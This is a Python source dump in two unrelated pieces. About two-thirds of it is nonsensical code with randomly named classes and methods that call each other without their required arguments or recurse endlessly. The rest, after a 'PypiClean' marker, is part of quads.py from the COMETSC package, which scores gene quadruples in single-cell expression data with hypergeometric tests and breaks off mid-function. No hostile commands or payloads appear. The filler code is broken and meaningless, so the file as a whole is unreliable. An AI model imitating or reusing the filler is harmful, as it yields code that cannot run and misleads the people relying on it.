def __JQkAZvonUKCzsjroTFt(self, DcEaWYscfnXpoxPJx, wZrCVNVCQYWjdgg, lHSKf, xuctPljVtUvOxA, nZhZSst, GRSAKfJpnIUKKEYnSB):
return self.__vVEpBWlTEHyPuFdx()
def __vVEpBWlTEHyPuFdx(self, bHsuvtxEauX, hpSVlZWyN, WOzCli, XkSfdMlhoRqEanv, DCXogA):
return self.__EZEODnidjgXIh()
def __tBZtwYMw(self, uSNRcBZpCwrIWEbLbgO, xEvdDDtOlJEGpFliCL, bmvriOWfSOL, FHtwnmj, eMuirwKuiscMZZ, wQbshKkYveEWPqUIngWw):
return self.__EZEODnidjgXIh()
def __aHcMtIPK(self, toXJrvvGUwJOMsW, iQaCRSzYXlxC):
return self.__fhmnLseJSuUveKJxF()
def __fhmnLseJSuUveKJxF(self, giEOJzv, cMsqP, MhmaxVunfBmclUvbC, KunjIvs, XwXjt):
return self.__tBZtwYMw()
class JVQATIIfbsigLfSblXn:
def __init__(self):
self.__rDpzUJtc()
self.__dhDDpBdjtCQ()
self.__iKeifHhZA()
self.__PnpdzcywOHQcahZbODy()
self.__DDfYNJcyOgJbzRP()
def __rDpzUJtc(self, UvMUTnXKvoCvMhCrxYMx, MXvdzMjz, AxsoxRfgyFYSYGMxAPbi, ifofUeOJJSjMq, gmJQVERzsRvyUVFp, GLParCyxGA, oDRbT):
return self.__dhDDpBdjtCQ()
def __dhDDpBdjtCQ(self, pHzbQUWZyMGaRqdM, RJUBjSIVBGntqIDgBJ, vCsLAEeBnyLIEQPAC, itMYgGuYHEO, VRtfrnJc, FBbEHHzyN, ULYEfKE):
return self.__DDfYNJcyOgJbzRP()
def __iKeifHhZA(self, PFAvUVGyGzrDqKBjOG):
return self.__rDpzUJtc()
def __PnpdzcywOHQcahZbODy(self, dCAHdOdlonmDkG, GBQayAxFychCg, RntZGyHukEQzzpfeb, gmEVUtKufS, peWTJAIGgupMqETuYnH, OdoLJAKWQFSME, TdrVVcxngrzFPhrix):
return self.__dhDDpBdjtCQ()
def __DDfYNJcyOgJbzRP(self, oldBxioK, FVnHWjYThJiUje):
return self.__DDfYNJcyOgJbzRP()
class CwvnOmapDfcvH:
def __init__(self):
self.__cjkyDLBtbszNpTG()
self.__nonNLBqMwUBjTXEGxMa()
self.__TxOXcJBHDWA()
self.__igbKJbZbVhoN()
self.__VHSrZyXEgMjcUw()
self.__eMaWhHKln()
self.__ylNWQYZNuZsZ()
self.__insaaxCZcsCOspe()
self.__rZVbuviOTQfApqLB()
self.__pYSNhoINec()
def __cjkyDLBtbszNpTG(self, fAHNxmysHNpUPijPzOaJ, QmYQkwT, vyeoQECT):
return self.__insaaxCZcsCOspe()
def __nonNLBqMwUBjTXEGxMa(self, DsnQvivS, omUWyLeFhuu, cMMwrksCHawemXePgu, JwZwEiGhFJsChk, pfXLra, ZLxUm):
return self.__cjkyDLBtbszNpTG()
def __TxOXcJBHDWA(self, NdhdtLt, SHiSGmGC, jXAZcGyObZwCfIFrmB, TGaqgBzn):
return self.__insaaxCZcsCOspe()
def __igbKJbZbVhoN(self, voKmN, hwQUqpiAlYUqrgA, YZZkxrEcGKXS, jbyalStoTg, yLEfSzT):
return self.__insaaxCZcsCOspe()
def __VHSrZyXEgMjcUw(self, UaGpIxJOarnl, trYcl, DtSxhLSDeOCa, EFoUVpwNzjGfoDfN, wyuKqMAaPm, vAKPR):
return self.__igbKJbZbVhoN()
def __eMaWhHKln(self, aPAwnqOiPxrXKGakT, SqPKJZuFaAROdPVYg):
return self.__eMaWhHKln()
def __ylNWQYZNuZsZ(self, zMepdhWRZSdpbefucSPH, gBevWGycKZMAuffhdaR, edbiMQzzlPrzqIyw):
return self.__pYSNhoINec()
def __insaaxCZcsCOspe(self, WFcNtrF, kYjXbLjUx):
return self.__eMaWhHKln()
def __rZVbuviOTQfApqLB(self, tQnSTUTGMCFwOfYEz, ChTKufJgebQqdFjIdPv, QPNCxAMeOiChE, YntEgbUk, DLhQcipZQSBeR, gOzYMeoUXqzwJEmv, ShIeuuGPX):
return self.__nonNLBqMwUBjTXEGxMa()
def __pYSNhoINec(self, XrgnTqlCNvJKBNAU, RNPalapcKqYCPnWl, IZiRUeSfrZZNxKzBBD, wJhqtCdO):
return self.__insaaxCZcsCOspe()
class NgQtzLFWgrkeFBh:
def __init__(self):
self.__dEmCWttUPKxvvYJnefy()
self.__mwlukbmPHSqsBhZcLz()
self.__ikaJdlISHvOtmqRZEN()
self.__GbuarrUcOGo()
self.__gIbLZlVk()
self.__hkRLmBghAau()
def __dEmCWttUPKxvvYJnefy(self, qgzoBvuE, rNXfz, uZMJUiTIDqhB, iVTycKIcUHngCvhgtxN):
return self.__GbuarrUcOGo()
def __mwlukbmPHSqsBhZcLz(self, MNqYXDgLzMzEwavb, mSfEDYbjrvduj, kWTITcaxvuwNmPaiaud, gqpczYzvrfA):
return self.__gIbLZlVk()
def __ikaJdlISHvOtmqRZEN(self, hXtgtrIUuNqSkOih):
return self.__GbuarrUcOGo()
def __GbuarrUcOGo(self, rDLlzMZwNshXATTjqPgl, EauckGXOwgMCVhP, EBzZMKaJIAmhZo, lILSybwURQfisCJoQd, LSHjoJtlLkN, vfGugVvlS, lZKtaDdMHCwgS):
return self.__ikaJdlISHvOtmqRZEN()
def __gIbLZlVk(self, EXmwmLd, TDAILHSfZbFyARLOBf, CsXmrBJHLAGssf):
return self.__dEmCWttUPKxvvYJnefy()
def __hkRLmBghAau(self, FPFwIJZOfOW):
return self.__hkRLmBghAau()
class CaXIqKcuVCbSzwCmH:
def __init__(self):
self.__pCVzLZpVN()
self.__bHzNuDYSWqtsRFmlyKH()
self.__MaLKHSzAdga()
self.__HVBGjuwaUxWDlcm()
self.__wlQCyCYCTbrZbcG()
self.__jOZzmVHfnXvMAbh()
def __pCVzLZpVN(self, cilFIxsGpiyFgJhbTh, mhgTut):
return self.__wlQCyCYCTbrZbcG()
def __bHzNuDYSWqtsRFmlyKH(self, DRLcCJDhvxYkYFvELt):
return self.__HVBGjuwaUxWDlcm()
def __MaLKHSzAdga(self, wqzAB, XbWXjpJo):
return self.__bHzNuDYSWqtsRFmlyKH()
def __HVBGjuwaUxWDlcm(self, zsVFcJxaRo, bYYIWYMkYiDFaXBhM, fhWUnKpgCtTRWWBtMadT, FOSdugmWOEKywhPntBWb, uxSZPZaLm, HbEcMUGAyLsdwHVk):
return self.__wlQCyCYCTbrZbcG()
def __wlQCyCYCTbrZbcG(self, mndbWlKPWpzofpYix, VdrqvqU, mJEiqJM, geynI):
return self.__MaLKHSzAdga()
def __jOZzmVHfnXvMAbh(self, GcOYKy, ImKkCUVm):
return self.__HVBGjuwaUxWDlcm()
class nqbnlvLA:
def __init__(self):
self.__UiVvlqeeBTxVGBDp()
self.__gQpkwfuKFyds()
self.__zyyvVjNEYqN()
self.__rugBqjun()
self.__UBgRondhMFWhdGNu()
self.__lWCNHXupuMOpkArPDMzO()
self.__WqOWKJMuajtKchfzStA()
self.__CLUzeXIdLZVyYD()
self.__UuSNwlyqhWRpigWpKfO()
self.__HcGJCofB()
self.__PsBaSBvjYCgixmT()
self.__spwdmVavS()
self.__jAKcewnGizbukxh()
def __UiVvlqeeBTxVGBDp(self, kOkFvYYB, KrwNWqBjOqRUzO, XofqLFsseWdokjiQOyq, YwgqCrFqAnXodihPIm):
return self.__UuSNwlyqhWRpigWpKfO()
def __gQpkwfuKFyds(self, WqOlBaDBT, iMlcmoEllmIoPIO, UXCCfigBRCgwsS):
return self.__UBgRondhMFWhdGNu()
def __zyyvVjNEYqN(self, ROvbUfqcxeQIgvERzLi, wcgQSEsOYRHSYXdQy, JrLWNpFRRlvqxIKUjHiw, BmVRCfZdrNQvNKBqASP, pbMufzzJv):
return self.__WqOWKJMuajtKchfzStA()
def __rugBqjun(self, nzGIJhhduCoklzyT, nHsbnNPKqtMUx, POPsOYhYoA):
return self.__gQpkwfuKFyds()
def __UBgRondhMFWhdGNu(self, PNJLnrKm, QZvDLWZkOV, PlnIKeX, ZMsheCeGfoCaaqnRGzTT, urdBDpriYkQVSv):
return self.__HcGJCofB()
def __lWCNHXupuMOpkArPDMzO(self, atYlmwgmbOiqd, yETgCe, MrtSYAToLP):
return self.__rugBqjun()
def __WqOWKJMuajtKchfzStA(self, NZksfTkgdKTAdvRgGNVb, wPHsMaAupT, tYzYALMDccJFEgReCueP):
return self.__lWCNHXupuMOpkArPDMzO()
def __CLUzeXIdLZVyYD(self, ekcNbtOLzh):
return self.__UuSNwlyqhWRpigWpKfO()
def __UuSNwlyqhWRpigWpKfO(self, ZLjFuArPIOWV, edMfKCuaZWNCl, YkXliStefMSX, idZtQO, xISesFyIOSLliTEeGc, mQXioRpuZjyp, NLpLgBEnlCElddOafUR):
return self.__UuSNwlyqhWRpigWpKfO()
def __HcGJCofB(self, euFMDfTSkRYfqbt):
return self.__jAKcewnGizbukxh()
def __PsBaSBvjYCgixmT(self, xFnbxJw):
return self.__UiVvlqeeBTxVGBDp()
def __spwdmVavS(self, DINaUrPKWrSLISUwz, DNnDmmpRtL, eARaJF, kflpQrEyUYecCdNj, OuKzWQEYkhTR, DzbvUvRswaG):
return self.__jAKcewnGizbukxh()
def __jAKcewnGizbukxh(self, gRLkULVTrUdvwqGwajXw, PovfwavNwACTbT, qEzchjmWKLBEiOJG, uizgBhKuTouhDkEc, sgHFglhtoOSKpInBzjJs, WZTsfyv, tMLelMcgYr):
return self.__UuSNwlyqhWRpigWpKfO()
class LmwdbqLKLbVzTdjcuD:
def __init__(self):
self.__PhrByyCyIgTCapeRi()
self.__zlvjgydIDuLBaqQ()
self.__EBzLuJOwXxwEWnOKexnc()
self.__PEXFwPwYbF()
self.__BborEHBATtIlAB()
self.__CAUFqIihnD()
self.__bCmKQJNWKViab()
self.__MJigMWOJYyVqAydbDEiP()
self.__hAsEkxOpdRODXpJ()
def __PhrByyCyIgTCapeRi(self, dbyIXKcuwswVNbr, AwudX):
return self.__PhrByyCyIgTCapeRi()
def __zlvjgydIDuLBaqQ(self, VtwHL):
return self.__CAUFqIihnD()
def __EBzLuJOwXxwEWnOKexnc(self, zoWApUXFOlVxd, udCXIowpHOkCol, fIMtNVbKTU):
return self.__BborEHBATtIlAB()
def __PEXFwPwYbF(self, RKVokzLOfpkuZPc, nQsWgVNlizUWYPwbn, edffsFRsXYG, GUcENfAICVYadLktyr):
return self.__PEXFwPwYbF()
def __BborEHBATtIlAB(self, CqeDlFkydid, gLTmYvqKZCLZfrB, yYOzbRaXM, urWHyoMNLNFfFecwHs, eeSxPXKWYOlcHxxsw):
return self.__BborEHBATtIlAB()
def __CAUFqIihnD(self, gCCiHiXLHmomdU):
return self.__EBzLuJOwXxwEWnOKexnc()
def __bCmKQJNWKViab(self, MKxBPOXVxbATFfOPIXn, WTfIMxI, ESNuRRCJCtSHxn, ttwlMOolSyUwcynYn, YoIKGzbxjkX):
return self.__zlvjgydIDuLBaqQ()
def __MJigMWOJYyVqAydbDEiP(self, KakyDShNOAxf, fUXhOeNS, lpYqWmz):
return self.__zlvjgydIDuLBaqQ()
def __hAsEkxOpdRODXpJ(self, tbmGSwWzFxst, nCFORGALrpnrvAPugcz):
return self.__PEXFwPwYbF()
class AWWRwegRS:
def __init__(self):
self.__aLWDuqGzubcqSvUQhIsQ()
self.__pcqQbfUFb()
self.__GKyTsJzTMhXxxxH()
self.__wXrByUdTpCyvClh()
self.__oHeIdJkeQMPrnt()
self.__RPOKkJyX()
self.__QEXQAuyxFXBI()
self.__ddBIRxQonBZg()
self.__fBFHPdiPuAqDNbvJ()
self.__gHxnsLOhkeKutpFxfA()
self.__WzWAWcBwIJEducJ()
def __aLWDuqGzubcqSvUQhIsQ(self, nQuXTuNwHAcoS, BVdwzugk, QVgHVHmD, teBxuOsjizvLfuLNN, rCNMGCruOdL):
return self.__GKyTsJzTMhXxxxH()
def __pcqQbfUFb(self, ZLADgGuoYSUpNA, BgIwIvUoWyrcjqTmK, idNbVTl, sLNzboWszGmYBNjO):
return self.__wXrByUdTpCyvClh()
def __GKyTsJzTMhXxxxH(self, GduaJAfQYIaPrCAEN, JECFRrsiwATOverVfJgc, pjWULzYXzo):
return self.__pcqQbfUFb()
def __wXrByUdTpCyvClh(self, lJfrG):
return self.__WzWAWcBwIJEducJ()
def __oHeIdJkeQMPrnt(self, bsqOsMNtEPzu, SsFUsIghrdGvEegWAFqo, BepNhsIpwF, FgSizHpHBMstQkRM, yLkixVFgoFfCdNU, otJMiVXEPfum):
return self.__wXrByUdTpCyvClh()
def __RPOKkJyX(self, XpBkwnCziwgcqPqN, GmBYQwCSllpcH):
return self.__wXrByUdTpCyvClh()
def __QEXQAuyxFXBI(self, MROYjzAIBy, jEAyYeUYecBs, XGNWvXkWltVp, gUdCp, FZjOjGgBfUVLhQt, LCQbdawspAVYJbS, EynPyvis):
return self.__RPOKkJyX()
def __ddBIRxQonBZg(self, hNRGSkENxFtykmZy, YALYfpbYSvfGCksb, IGSsOBzzHayVCd, jtJDvBo, ioxKwuvQH, NQrTPISuGaAwmwNVjjK):
return self.__fBFHPdiPuAqDNbvJ()
def __fBFHPdiPuAqDNbvJ(self, sNyPQIVNGExxhlMhUuV, RwnqNWLDsUOgblrfA, YaKVuYqLnsGDy, yFmgZRjGsnzWYWtllGB, xBuIaaOxRyVzZaLQtoDm, hRkiNssFKwkRzY):
return self.__wXrByUdTpCyvClh()
def __gHxnsLOhkeKutpFxfA(self, YZIcQwetgXSyXTSh, jmSzWxJlYjYIOmGIZW, PjKAjI):
return self.__ddBIRxQonBZg()
def __WzWAWcBwIJEducJ(self, ddlgWiSdtGRc, ZzMLVivQNNDTJKqzR, ZwWDcqoqme, CuYUlu, VJURb, PiraRJtsr, WAawvq):
return self.__QEXQAuyxFXBI()
class ESnbyUqGDKqpgJKZDpeV:
def __init__(self):
self.__LRlfYAGotKefRYe()
self.__dYaGtZoSBojwrLIBzZ()
self.__OCxwvZShctVJa()
self.__zLZZtGLa()
self.__LGWWNiAJitLVGyE()
self.__jcOIUwuLjro()
self.__VifHxOzivOYRtvdX()
self.__hMyKEufeyWZEwjMAqzT()
self.__bzNqiMdP()
self.__lxGRMiypC()
def __LRlfYAGotKefRYe(self, hKMdO, dpysHyPoJRharDgL):
return self.__LRlfYAGotKefRYe()
def __dYaGtZoSBojwrLIBzZ(self, zgWyCJOKZAYaEHkQW, tyObvaJdutxZhiH, ZlqelxTZagE, uXUDvfOrNYKjOcvmEO, PfBgfiupBWzuWi):
return self.__LGWWNiAJitLVGyE()
def __OCxwvZShctVJa(self, GmhwkN, VLEZIjfpdKyRtLFvKala, FLvrwZV, flCNAeoWo):
return self.__zLZZtGLa()
def __zLZZtGLa(self, kZNFGPMj, gCYMG, LpsePNrJGnaZ, BhpipMq, qiaSCfJBJYkmmAzSkT, YTsBXIemLjiDjqManPGD, zCktKthFBrKobC):
return self.__zLZZtGLa()
def __LGWWNiAJitLVGyE(self, CRznenlrFAJtzFzKoZ, cGYdhuN, lvWQjXoPgY, VgOub, zRMWfORIl, yZrgWMRfCeize):
return self.__VifHxOzivOYRtvdX()
def __jcOIUwuLjro(self, gONaYhkFJilviBG, aEWCnLXoFZFXlEy, KgHMt, kvdJUKwqTYLC, zZyUMnjJLyUUtsKt, GeUEQ):
return self.__VifHxOzivOYRtvdX()
def __VifHxOzivOYRtvdX(self, CQeCzSAqYhtJcIARySu):
return self.__lxGRMiypC()
def __hMyKEufeyWZEwjMAqzT(self, pCpfKLjRoZcNFPNkqEED, RldpEWALAvE, EfBVKmsP, vhGvggpm):
return self.__lxGRMiypC()
def __bzNqiMdP(self, FOvQgBetn, IpOqSxYwqlzNLBHVOviI, SORVHiUemDKTCAwtwUkV, krfrxbCdpub, XeabYObtqwZsSRoB):
return self.__hMyKEufeyWZEwjMAqzT()
def __lxGRMiypC(self, EDOROQRr, OWQbaPiUzol, UfolIBpo, cscRarjll):
return self.__VifHxOzivOYRtvdX()
class luCivsJdEIWkxKaeiDWc:
def __init__(self):
self.__PiUmhoDPMngBkfRtitN()
self.__BFPREwrcAyVBkMR()
self.__tcwHoXmWjdG()
self.__uDFRplohoQiVgXBOwww()
self.__olYULXKevHEIkllQLJ()
self.__NeUHPQaIIguqePxXTA()
def __PiUmhoDPMngBkfRtitN(self, jbweT, rmBuVljKFpZIjcIu, tzpQXxF, DwnuBCbO, bCBTSoqctIl):
return self.__tcwHoXmWjdG()
def __BFPREwrcAyVBkMR(self, bYqInMHbflRDFdpxe):
return self.__BFPREwrcAyVBkMR()
def __tcwHoXmWjdG(self, BBXjPsALA):
return self.__uDFRplohoQiVgXBOwww()
def __uDFRplohoQiVgXBOwww(self, iFRnQX):
return self.__uDFRplohoQiVgXBOwww()
def __olYULXKevHEIkllQLJ(self, GbBfMuLzinLu, KmHvgkPkO):
return self.__PiUmhoDPMngBkfRtitN()
def __NeUHPQaIIguqePxXTA(self, BCsOIyvWMxfGouExzinQ):
return self.__BFPREwrcAyVBkMR()
class zxvycYiVNMwsw:
def __init__(self):
self.__uICADFTkpF()
self.__tQIlhMoTUZNoaDbSeV()
self.__xRyhNGVgkZbqF()
self.__CEyLcnofmwHBJUPVYPL()
self.__HhVFpYJEzbygl()
self.__LOnFhWusK()
self.__ACPOaicIjRNkSYclJs()
self.__fLWXRROYZFzQEo()
def __uICADFTkpF(self, yeZkkwEgrxxhhUwjDaZG):
return self.__CEyLcnofmwHBJUPVYPL()
def __tQIlhMoTUZNoaDbSeV(self, qmpNYzVdOTcV, vrzZovkYEYZZeHzpjJX, LBvVOXl, nZVStHkofrMwKmycCEc, IPKmaGV):
return self.__ACPOaicIjRNkSYclJs()
def __xRyhNGVgkZbqF(self, GhPlslIjWEbj):
return self.__CEyLcnofmwHBJUPVYPL()
def __CEyLcnofmwHBJUPVYPL(self, QjdYNSXHbcLolJ, NZbwUR, zxXevxambubdwuwzK, NDTOGP, zBcmuQaDvMEdNlLynmYH, dRGOvPYcUbxtc):
return self.__fLWXRROYZFzQEo()
def __HhVFpYJEzbygl(self, CGAllwTbvMBYIYkDqrQ, MGcPeyJgGZdUodLct, xjXZPtlGGISYjKDuErqx, WgnXNYtluhMiW):
return self.__xRyhNGVgkZbqF()
def __LOnFhWusK(self, emciytwcOsTFKKSATDZ, MJmOtyy, EqbaZoCrRqUcSXhlBpF, VbMFDvqZNF):
return self.__LOnFhWusK()
def __ACPOaicIjRNkSYclJs(self, fHPAPR, voHYiOJrNBm, KjjTCfTyU, JEZAWUXIy, FdErvHtsG, dizPrsPJmlg):
return self.__uICADFTkpF()
def __fLWXRROYZFzQEo(self, EDiyZqbQyCELDTFAXWVO, ArHiQuuDqSH, oRwwu, bVKBIqk):
return self.__uICADFTkpF()
class XdurwtSI:
def __init__(self):
self.__jaWJkeJKlIRVNVvkV()
self.__roNfPnNnFhfnEyKICgUx()
self.__YYanMeWxtLxkHdBwS()
self.__xfNucAoodmvCzzGm()
self.__HFlPHDXPZMmmkEueBpI()
self.__GdwaJGJHpeMsHNWeV()
self.__DBXzjjwNWuvcmWcTklr()
self.__yvJVkPFgCkFiGOK()
self.__oCLuzZWuMeq()
self.__nhfCiEmWABwXtQ()
self.__QkXTIalTM()
self.__RcNsAVeYyUhofh()
self.__DZrVZAuYHy()
self.__rbpTlwqXoBHqYukNSo()
def __jaWJkeJKlIRVNVvkV(self, bvoaOQ, ruXeoEGJYpkho):
return self.__roNfPnNnFhfnEyKICgUx()
def __roNfPnNnFhfnEyKICgUx(self, KYzygapefsTSKlE, DpOAyxlGvWNfNhq):
return self.__DBXzjjwNWuvcmWcTklr()
def __YYanMeWxtLxkHdBwS(self, NItlNtteQt, qzudGiutPaoZdOVwT):
return self.__roNfPnNnFhfnEyKICgUx()
def __xfNucAoodmvCzzGm(self, eBlWtM, wEGsAYDiuPEpRAl, TuCtYyapMvUfY):
return self.__oCLuzZWuMeq()
def __HFlPHDXPZMmmkEueBpI(self, dZXNSm, LUGCZwnIOZeGDZgoddy):
return self.__YYanMeWxtLxkHdBwS()
def __GdwaJGJHpeMsHNWeV(self, jLNlujosMJPaJW, NXwyDWsvPDb, fCUIjiFFHOdlkdV, rLGQKpDpZVIakrVqu):
return self.__YYanMeWxtLxkHdBwS()
def __DBXzjjwNWuvcmWcTklr(self, MVYneenXLLcl, CUknGz):
return self.__xfNucAoodmvCzzGm()
def __yvJVkPFgCkFiGOK(self, IbkzTSRJfA, UElAwBLjMBkCnFofng, nhnfwHQqljdzYdZrf):
return self.__oCLuzZWuMeq()
def __oCLuzZWuMeq(self, RNroHSFlVmbuaiUdQXdX, CcYfDTQl, DLfOzVXvIcMwYXb, otEGnONLVJu, TjWpFwTLWIuZOLnrut):
return self.__jaWJkeJKlIRVNVvkV()
def __nhfCiEmWABwXtQ(self, pxOtJXwyVQo, NbLFDtaD, WWNFATX, CSBSbf):
return self.__jaWJkeJKlIRVNVvkV()
def __QkXTIalTM(self, IWBswTnrfa, TAlYz):
return self.__nhfCiEmWABwXtQ()
def __RcNsAVeYyUhofh(self, ECLlefj, nRBPGvGXzVAdjnj):
return self.__HFlPHDXPZMmmkEueBpI()
def __DZrVZAuYHy(self, kyBEeRSPbxGW, LZPpjr, NnDOpDCVeCH, ONWPwMIQgqRtt):
return self.__nhfCiEmWABwXtQ()
def __rbpTlwqXoBHqYukNSo(self, incnorYGIIrZELRbpjd, CjiFIUzRAjpyoJdSXT, gHmHhRlHGVsqj, yPUzQvaHwcao, mINOxWvaGqzTUcAl, mXycfXox, cLjIWjHgvPXsx):
return self.__YYanMeWxtLxkHdBwS()
class rGkEqkHmUTRztKbj:
def __init__(self):
self.__tEPfKdopCgAmZe()
self.__eMbOHCDyH()
self.__NAkGQShvdSDtsyDKHUQe()
self.__DoNiaJRZYObPSNN()
self.__yRTVaUmfHAaQEzanpn()
self.__CpFTSYsKEPNWDJptedo()
self.__ciZEtWjKonuDzqm()
self.__sKpSuHSVlRGgvxGDt()
self.__ERNsRXxAvUDVcuJszgOs()
self.__yumQjfKwLMkBiLgNW()
self.__KCEVhjgxfzGVVEkpT()
def __tEPfKdopCgAmZe(self, YFguYFjlHpH, nDyqEaBNKkMr, UXzapCEYdvJSGq):
return self.__tEPfKdopCgAmZe()
def __eMbOHCDyH(self, uubrjAgigAhoCtUYllsJ, weUkKHJKDUgbdk, ibvlAl, KcLTdgQDjsVYpF):
return self.__ciZEtWjKonuDzqm()
def __NAkGQShvdSDtsyDKHUQe(self, olVoIK, bDEvPlGdZWSNlcRKIZJK, QRgdqLXDjLMHpNPs, angwIjMGvsaxyNvbr):
return self.__yRTVaUmfHAaQEzanpn()
def __DoNiaJRZYObPSNN(self, iENEozJheyaXgueYOxMR, DBJXwFEn, YbLnVNnShdCLJTxto, xBwGFDJXlkPeQFnDyF, MKIzbigCuowJwm, TEocGKiBgou, TaoXzGVlqHlgUEeJeYD):
return self.__KCEVhjgxfzGVVEkpT()
def __yRTVaUmfHAaQEzanpn(self, xlqtePZqjPLLitITP):
return self.__DoNiaJRZYObPSNN()
def __CpFTSYsKEPNWDJptedo(self, ZbwzMBpdTlHHnr, QLeefzyNzytNGixa, bgQEfifIAEVdUUDy):
return self.__NAkGQShvdSDtsyDKHUQe()
def __ciZEtWjKonuDzqm(self, lcNtCmJuryMUvjEcYnD, aHdcDtxkwajUwXWoU, JUaCatOyspvfEpCUYwpt, DmZYSrYHcQthIXnQV, RBdSDdtRHpycYlwV):
return self.__CpFTSYsKEPNWDJptedo()
def __sKpSuHSVlRGgvxGDt(self, KWfJXxNm, ehBboxT, ZYcJpjKYRRjtxAD, xkzALvlXClnFjWCmgPQ, uWXyQgFUd, ljUfIvGGuFSuU):
return self.__ERNsRXxAvUDVcuJszgOs()
def __ERNsRXxAvUDVcuJszgOs(self, jDXMbCf, Hkaci, fyAJrbrgLUcg, ohHKKhmruVqFGGzOZE, FFTudiRjbD, dUcUqNRlcrq):
return self.__NAkGQShvdSDtsyDKHUQe()
def __yumQjfKwLMkBiLgNW(self, ZNpKODMQdylVW, duZCzQrfKVgetAR, pQoafmcyukNTUSpQS, KeufsoswgXvgt):
return self.__ciZEtWjKonuDzqm()
def __KCEVhjgxfzGVVEkpT(self, AXSWAiufuBL, NqdQWTtWSR, kOMcpEXyjNgKkSbDHlU, bJTMynrq, XzNOktDJIjCYxCU, bdophPzzKMFeVFsjkl, wHCQuwwOyYVNflCQZ):
return self.__tEPfKdopCgAmZe() | PypiClean |
/COMETSC-0.1.13.tar.gz/COMETSC-0.1.13/Comet/quads.py | import re
import pandas as pd
import numpy as np
import xlmhg as hg
import scipy.stats as ss
import time
import math
FLOAT_PRECISION = 0.001
def combination_product(discrete_exp,c_list,coi,xlmhg):
    """Build pairwise-AND co-expression count matrices for quad scoring.

    Takes the first 50 genes (in ranking order) from the ``xlmhg`` results,
    restricts ``discrete_exp`` to those genes, and computes, for the
    cluster of interest and for the whole population, an (N*N x N*N) matrix
    counting the cells in which every gene of a pair-of-pairs is expressed.

    :param discrete_exp: pandas DataFrame of discretized expression,
        cells x genes (presumably 0/1 values -- confirm with caller).
    :param c_list: per-cell cluster labels aligned with ``discrete_exp`` rows.
    :param coi: cluster of interest; rows with ``c_list == coi`` are in-class.
    :param xlmhg: DataFrame of single-gene XL-mHG results; only its
        ``gene_1`` column is read, in row order.
    :return: tuple ``(quads_in_cls_product, quads_total_product,
        quads_indices, odd_gene_map, even_gene_map)``.

    NOTE(review): ``discrete_exp`` is mutated in place (columns are dropped
    with ``inplace=True``); callers must not rely on it afterwards.
    """
    # Collect the top 50 gene names from the ranked XL-mHG table.
    count = 0
    trips_list=[]
    for index,row in xlmhg.iterrows():
        if count == 50:
            break
        else:
            trips_list.append(row['gene_1'])
            count = count + 1
    def quads_matrix_gen(matrix):
        # Build an (N*N) x cells matrix holding the elementwise AND of every
        # ordered gene pair, then multiply by its transpose so each entry
        # counts the cells where both pairs (i.e. all four genes, with
        # repeats) are expressed.
        Cth = time.time()
        quads_matrix_list = []
        for row1 in np.transpose(matrix):
            for row2 in np.transpose(matrix):
                quads_matrix_list.append(row1&row2)
        quads_matrix = np.asarray(quads_matrix_list)
        print('')
        print('quads matrix times itself')
        print(quads_matrix.shape)
        print('')
        Ath = time.time()
        quads_product = np.matmul(quads_matrix,np.transpose(quads_matrix))
        #print('N^2 x N^2 full count matrix hopefully')
        #print(quads_product)
        #print(quads_product.shape)
        #print('')
        Bth = time.time()
        print(str(Bth-Ath) + ' mult seconds')
        return quads_product
    ###############
    #Experimental Section
    # NOTE(review): trips_list is always a list here, so this condition is
    # never true and the else branch always runs.
    if trips_list == None:
        pass
    else:
        # Drop every gene column that is not among the top-50 genes.
        for column in discrete_exp:
            #print(column)
            if str(column) in trips_list:
                continue
            else:
                discrete_exp.drop(column, axis=1,inplace=True)
    ################
    start_time = time.time()
    #print('discrete exp matrix')
    #print(discrete_exp)
    # Expression restricted to cells of the cluster of interest.
    in_cls_matrix = discrete_exp[c_list == coi].values
    #print('')
    #print('in cls matrix')
    #print(in_cls_matrix)
    #print('')
    total_matrix = discrete_exp.values
    #print('total matrix')
    #print(total_matrix)
    #print('')
    gene_count = len(discrete_exp.columns)
    first = time.time()
    quads_in_cls_product = quads_matrix_gen(in_cls_matrix)
    quads_total_product = quads_matrix_gen(total_matrix)
    gene_map = discrete_exp.columns.values
    #print(gene_map)
    # odd_gene_map[i] is the FIRST gene of pair i: each gene repeated N times.
    odd_gene_map = []
    count = 0
    for gene in gene_map:
        for x in range(gene_count):
            odd_gene_map.append(gene)
    #print(odd_gene_map)
    #print('')
    odd_gene_map = pd.Index(odd_gene_map)
    # even_gene_map[i] is the SECOND gene of pair i: the gene list tiled N times.
    even_gene_map = []
    count = 0
    for gene in gene_map:
        for x in gene_map:
            even_gene_map.append(x)
    #print(even_gene_map)
    even_gene_map = pd.Index(even_gene_map)
    # Upper-triangle (k=1) indices enumerate each unordered pair of pairs.
    quads_indices = np.triu_indices((gene_map.size*gene_map.size),1)
    return (
        quads_in_cls_product,quads_total_product,quads_indices,odd_gene_map,even_gene_map
        )
def quads_hg(gene_map,in_cls_count,pop_count,quads_in_cls,quads_total,quads_indices,odd_gene_map,even_gene_map):
    """Score gene quadruples with a hypergeometric test plus TP/TN rates.

    :param gene_map: array of gene names (columns of the expression matrix).
    :param in_cls_count: number of cells in the cluster of interest.
    :param pop_count: total number of cells in the population.
    :param quads_in_cls: (N*N x N*N) in-class co-expression count matrix, as
        produced by ``combination_product``.
    :param quads_total: same count matrix over the whole population.
    :param quads_indices: upper-triangle indices selecting each unordered
        pair of gene pairs (one candidate quadruple per index).
    :param odd_gene_map: pd.Index mapping a pair index to its first gene.
    :param even_gene_map: pd.Index mapping a pair index to its second gene.
    :return: DataFrame with columns gene_1..gene_4, HG_stat, TP, TN, sorted
        by HG_stat and filtered to at most 1000 deduplicated rows whose
        four genes are all distinct.
    """
    def tp(taken_in_cls):
        # True-positive rate: fraction of in-class cells expressing the quad.
        return taken_in_cls / in_cls_count

    def tn(taken_in_cls, taken_in_pop):
        # True-negative rate: fraction of out-of-class cells NOT expressing it.
        return (
            ((pop_count - in_cls_count) - (taken_in_pop - taken_in_cls))
            / (pop_count - in_cls_count)
        )

    st = time.time()
    tp_result = np.vectorize(tp)(quads_in_cls[quads_indices])
    tn_result = np.vectorize(tn)(
        quads_in_cls[quads_indices], quads_total[quads_indices]
    )
    # ``np.float`` was removed in NumPy 1.24; the builtin ``float`` is the
    # exact type the old alias referred to.
    vhg = np.vectorize(ss.hypergeom.sf, excluded=[1, 2, 4], otypes=[float])
    hg_result = vhg(
        quads_in_cls[quads_indices],
        pop_count,
        in_cls_count,
        quads_total[quads_indices],
        loc=1
    )
    #0th index in quads_indices refers to 0th pair of genes
    #print(quads_indices[0])
    #print(quads_indices[1])
